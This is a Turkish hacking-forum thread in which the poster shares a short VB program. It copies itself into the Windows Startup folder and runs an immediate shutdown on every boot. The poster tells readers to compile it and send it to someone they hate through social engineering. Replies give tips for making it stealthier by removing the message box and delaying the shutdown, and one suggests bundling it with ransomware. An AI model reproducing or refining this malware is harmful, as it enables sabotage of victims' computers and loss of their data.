VB.NET Nefret Ettiğiniz İnsandan Kurtulun!

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Griffin Premium
Ödüller
12
10 HİZMET YILI
:resim:

il.png

:yazı:

Herkese selam dostlarım! Bugün sizlere arşivim de bulduğum bir kodu göstereceğim çok kısa ama bir hayli etkili olan bu kodu size tanıtacağım, Öncelikle konum kısa ama bir o kadar da eğlenceli olacaktır, dilerseniz hemen konuya geçelim! Öncelikle bu vereceğim kodu kesinlikle siz kullanmayacaksınız editleyebilirsiniz problem yok ama açtığınız anda bilgisayarınız formatlık duruma gelecektir. Evet bir zamanlar benim de kullandığım bu kod işe yarıyor fakat dikkat edilmesi gereken nokta sizin açmamanız. Kodun çalışma mantığı kısaca şöyle ki bu kod her bilgisayar açıldığında çalışacak ve bilgisayarı kapatacak, bilgisayarı formatlık duruma getirecektir. Sakın ola bu kodu kendi bilgisayarınız da çalıştırmayın!

:kullan:

Kodu ister editleyin ister bu şekilde "Visual Basic" programında ".exe" olarak kaydedin ve nefret ettiğiniz insana gönderin hepsi bu :)

:not:

*Kesinlikle kendi bilgisayarınız da çalıştırmayın!
*Bu kodun sorumluluğu indirdiğiniz andan itibaren sizdedir sorumluluk kabul etmiyorum!
*Sosyal Mühendislik kullanarak nefret ettiğiniz insan / insanlara yedirebilirsiniz.

VB.Net:
Private Sub Form_Load()
FileCopy App.Path & “” & App.EXEName & “.exe”, “C:********s and SettingsAll UsersStart MenuProgramlarBaşlangıç” & App.EXEName & “.exe”
MsgBox “Lol xd”, vbInformation, “Kendine cicci baak :dd”
Shell (“shutdown -s -t 1″)
End Sub

Son düzenleme:
Banlı Üye
8 HİZMET YILI
shutdown -s -t 1
1 sayısı bilgisayarın ne zaman kapatılacağının saniyesidir 20 yaparsak 20 saniye sonra kapanır insanlar bilgilensin :gelisirabi:
yararlı

The story about good
Ultra Üye
Ödüller
10
8 HİZMET YILI
O zaman dans , acayip iyi kodmuş peki güvenli modda açılsa yine kapanırmı ?

Banlı Üye
7 HİZMET YILI
Çok Yararlı Bir Konu, Bu Kodu Bilmeyenler İçin Sıkıntı Var Demektir :)

The story about good
Ultra Üye
Ödüller
10
8 HİZMET YILI
Güvenli modda program tabiki kapanıyor güvenli modda sadece "Windows" uygulamaları çalışıyor maalesef.
Kod çok güzel fakat msg box lar program açıldığı andan itibaren açılıp bilgisayar o andan itibaren kapanmaya başlayacağı için kişi virüs yediğini anlayabilir ve akıllıysa güvenli mod ile bilgisayardaki verileri kurtarabilir benim önerim msg box ların kullanılmaması ve bilgisayarın yaklaşık 2 dakika sonra kapanmasıdır

Süper Üye
Ödüller
8
7 HİZMET YILI
Bu kodu kullanarak hekırlık yapabiliriz :D eline sağlık umarım kullanacak arkadaşlar global kullanılan bir programda kullanmazlar.

Griffin Premium
Ödüller
12
10 HİZMET YILI
Kod çok güzel fakat msg box lar program açıldığı andan itibaren açılıp bilgisayar o andan itibaren kapanmaya başlayacağı için kişi virüs yediğini anlayabilir ve akıllıysa güvenli mod ile bilgisayardaki verileri kurtarabilir benim önerim msg box ların kullanılmaması ve bilgisayarın yaklaşık 2 dakika sonra kapanmasıdır
Mantıken bunu akıllı birine yapamazsın zaten, timing 1 saniye olduğu için o verileri zarar görecektir bunu bir fidye virüsüne ekleyebilir ya da konuda belirttiğim gibi editleyerek atabilirsin.

⭐ Perfo ⭐
Ultra Üye
Ödüller
10
8 HİZMET YILI
Virtual Server'da denersek sorun çıkarmayacaktır. Çok merak edenler Bir sanal sunucu oluşturup deneyebilir. Güzel konu, ellerine sağlık.

Griffin Premium
Ödüller
12
10 HİZMET YILI
@Bleedat Global program da kullansa dahi programın içine gömülmesi gerekir ki decompile edilğinde bu kod anlaşılır zaten.
Post automatically merged:

Virtual Server'da denersek sorun çıkarmayacaktır. Çok merak edenler Bir sanal sunucu oluşturup deneyebilir. Güzel konu, ellerine sağlık.
Teşekkürler :)

Griffin Premium
Ödüller
12
10 HİZMET YILI
Evet, Mesela İntikam Gibi Hele Burda İntikam Kokusu Çok Fazla Var Çoğu Kişi Elimine Edilecekmiş Gibime Geliyor Sizde Alıyormusunuz?
Dediğim gibi olacaklardan ben sorumlu değilim, eğer gerçekten hak yenmişse ceza olarak bu uygulanabilir çünkü bu şaka virüsünün de ötesinde bir şey.

Banlı Üye
7 HİZMET YILI
Dediğim gibi olacaklardan ben sorumlu değilim, eğer gerçekten hak yenmişse ceza olarak bu uygulanabilir çünkü bu şaka virüsünün de ötesinde bir şey.
Bunun Ne Olduğunu Biliyorum,Daha Öncede Biliyordum BirÇok Yazılım Dili Biliyorum Ve Cr4ck İcraat'ım Olmuştur. Ve Çoğu Reserve Türünü Yani Olacaklardan Sizi Sorumlu Tutmuyorum. Böyle İntikam Doğuran Bir Ortamda Bu Kod'u Yememek İmkansız. Farklı Programlar İle Hatta :)

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...